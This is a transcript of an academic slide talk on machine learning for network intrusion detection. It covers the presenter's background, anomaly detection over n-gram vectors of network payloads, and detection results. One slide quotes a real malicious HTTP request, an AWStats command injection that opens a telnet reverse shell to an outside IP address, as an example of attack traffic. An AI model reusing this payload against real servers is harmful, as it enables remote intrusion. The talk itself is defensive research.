html5-img
1 / 21

Machine Learning

Machine Learning. for Network Intrusion Detection. Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this box.: A A A A A A A A A A A A A. Personal Information. Berkeley, California. Dr. Marius Kloft Studies

chinara
Télécharger la présentation

Machine Learning

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this box.: AAAAAAAAAAAAA

  2. Personal Information Berkeley, California • Dr. Marius Kloft • Studies • in physics and mathematics • at University of Marburg • in computer science • in Berkeley and Berlin • Degrees • Dipl.-Mathematiker, 2006 • Thesis in pure math • Dr. rer. nat., 2011 • Thesis in cs and statistics • PhD advisors • Prof. Dr. Klaus-Robert Müller • (EECS, TU Berlin) • Prof. Dr. Peter L. Bartlett • (EECS & Statistics, UC Berkeley) • Prof. Dr. Gilles Blanchard • (Statistics, Uni Potsdam)

  3. Dr. Marius Kloft • Current occupation • Post-Doc • jointly appointed at • Machine Learning Laboratory, TU Berlin • Head: Prof. Dr. Klaus-Robert Müller • Friedrich-Miescher Laboratory, Max Planck Society, Tübingen • Head: Dr. Gunnar Rätsch (will be transferred to Sloan Center for Cancer Research, New York) • I am heading the SeqMLpreoject team (Berlin/Tübingen) • 2 PhD student • 4 Master students • PI: Prof. Müller • Goal • development of intelligent algorithms (“machine learning”) • for computational genome annotation

  4. Dr. Marius Kloft • Research interests • Statistical machine learning methods • Development of new algorithms • mathematical optimization thereof • Analysis of their statistical properties • in terms of probabilistic bounds • Multiple Kernel Learning • My PhD thesis: “Lp-Norm Multiple Kernel Learning” • Applications • Detection of genes in genomic DNA • Detection of attacks in computer networks • Categorization of images

  5. Machine Learning Laboratory, TU Berlin • Some facts • Head • Prof. Dr. Klaus-Robert Müller • Scientists • 11 post-Docs • 35 PhD students • Research focus • Development of novel intelligent algorithms • for analysis of complex data • Remind project • Joint project of TU Berlin and Fraunhofer FIRST, Berlin • Development of intelligent methods for detecting intrusions in computer networks • Facts • Until 2010 • 2 post-docs • 5 PhD students • Spin-Off “Trifense GmbH” awarded first price of „Gründungswettbewerb“ (BMWi)

  6. Machine Learning for Intrusion Detection Joint work with the members of the Remind project team: KonradRieck, PavelLaskov, Ulf Brefeld, Christian Gehl, TammoKrüger, Patrick Düssel, NicoGörnitz, Rene Gerstenberger, Guido Schwenk

  7. Danger from the internet What is machine learning (ML)? Algorithms for intrusion detection Empirical analysis Machine Learning for Intrusion Detection Talk Overview

  8. Danger from Internet • Internet as a risk factor: • Omnipresence of computer worms, viruses and trojans • Major damage to companies and customers • Increasing criminalization

  9. Why do we still get hacked? • New vulnerabilities are discovered • 2,000-3,000 vulnerabilities per year • New attacks are developed • high degree of automation • Incident response is too slow

  10. How secure are modern detection tools? • Experiment • Current instances of malware were collected from a Nepenthes honeypot • Files were scanned with AviraAntiVir • Results • First scan: • Conclusion • After four weeks still 15% of malware instances not recognized! • Second scan:

  11. Danger from the internet What is machine learning (ML)? Algorithms for intrusion detection Empirical Analysis Machine Learning for Intrusion Detection Talk Overview

  12. What is statistical machine learning? • Given: • Data • E.g., xi could be a HTTP request (e.g., computer attack) • Concepts • E.g., yi=1 could mean that xi is a computer attack • Goal: • Finding a function f that models the dependency between xi and yi • i.e., • So that f generalizes to novel, previously unseen(x,y) • i.e., • 2-step approach: • 1. Training: • Input data and concepts into learning algorithm • Learning Algorithm outputs f • 2. Prediction: • Use f(x) to predict labels y for new, unseen x • Core idea • Choose an f that • Fits the data well • But is not too “complex”

  13. Example: Trade-off of Fit and Complexity • Data: • Machine learning solution: • Not too complex, not too easy • Which f to choose? • Linear f • Misses out two points (too simple) • Polynomial f • Pro: Perfect on training data • Contra: does not generalize to new data • Too complex

  14. Danger from the internet What is machine learning (ML)? Algorithms for intrusion detection Empirical Analysis Machine Learning for Intrusion Detection Talk Overview

  15. Benefits of Machine Learning to Intrusion Detection • Ability to generalize from large amounts of data • automation of decision making • faster incident response times • Understanding of statistical foundations of empirical inference • better accuracy, small false alarm rates • Ability to detect novelty • protection against new attacks

  16. How Does Network Payload Look Like? • Innocuous payload • GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de • Malicious payload • GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo|HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a

  17. From Network Payload to Vectors • General idea • count occurrences of substrings (“n-grams”) • Example: • Define an appropriate embedding function: • In the end, payload is represented as vectors:

  18. Detection of New Attacks • (Rieck et al., DIMVA 2007) • Anomaly-based machine learning approach • Represent network payload as vectors • Finding a hypersphere • that encloses the innocuous data (blue circles) • and generalizes to new data • Points outside of the hypersphere (red circles) • are flagged as being anomalous

  19. How well does our system work? • Detection results • Evaluation on a real attack dataset generated by a penetration testing expert • Detection of 80-93% of unknown attacks in HTTP, FTP and SMTP protocols without false alarms • Major improvement of accuracy in comparison to the standard signature-based IDS Snort

  20. Outlook: Extensions of the Framework • Active learning • Finding data points • that – when presented to security expert – maximally help performance of the system • Problem: which labels to present? • In a nutshell: focus on points that contain novel, uncertain information • Automatic feature selection • Payloads can be represented by various feature embeddings • Which feature embedding to take? • “Multiple Kernel Learning” approach: • Use all embeddings simultaneously • But take a weighted combination • Do it automatically at training time • (M. Kloft, PhD thesis, 2011) • (e.g., Görnitz, Kloft et al., ACM AISEC 2009, ECML 2009) • (e.g., Kloft et al., ACM AISEC 2008, ECML 2009, • NIPS 2009, ECML 2010, NIPS 2011, JMLR 2011)

  21. Conclusions • Intrusion detection • Detecting malicious payload in network streams • Machine learning approach • Embedding of application payloads in vector spaces • Detection of anomalies in embedded data • Empirical analysis • Detection of 80-93% unknown attacks • no false positives • Allows one to find novel attacks

More Related